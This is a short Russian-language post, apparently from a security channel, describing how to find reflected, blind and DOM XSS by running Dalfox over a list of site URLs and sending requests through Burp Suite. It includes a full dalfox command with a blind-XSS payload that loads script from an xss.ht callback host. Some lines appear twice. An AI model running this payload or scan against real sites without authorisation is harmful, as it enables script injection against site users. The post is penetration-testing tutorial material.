📑 Находим Reflected, Blind и DOM XSS с помощью Dalfox и Burp Suite
Собираем список URL адресов сайта и помещаем в файл
С помощью команды ниже находим XSS с помощью Dalfox и отправляем каждый запрос в Burp Suite для ручного тестирования:
#web #xss
Собираем список URL адресов сайта и помещаем в файл
urls_list.txt. Затем для поиска Blind XSS регистрируемся на сайте xsshunter.com и получаем ссылку вида shadow.xss.ht, где на месте «shadow» будет ваш ник.С помощью команды ниже находим XSS с помощью Dalfox и отправляем каждый запрос в Burp Suite для ручного тестирования:
dalfox file urls_list.txt --mining-dom --deep-domxss --ignore-return -b '"><script src=YOURS.xss.ht></script>' --follow-redirects --proxy http://127.0.0.1:8080
#web #xss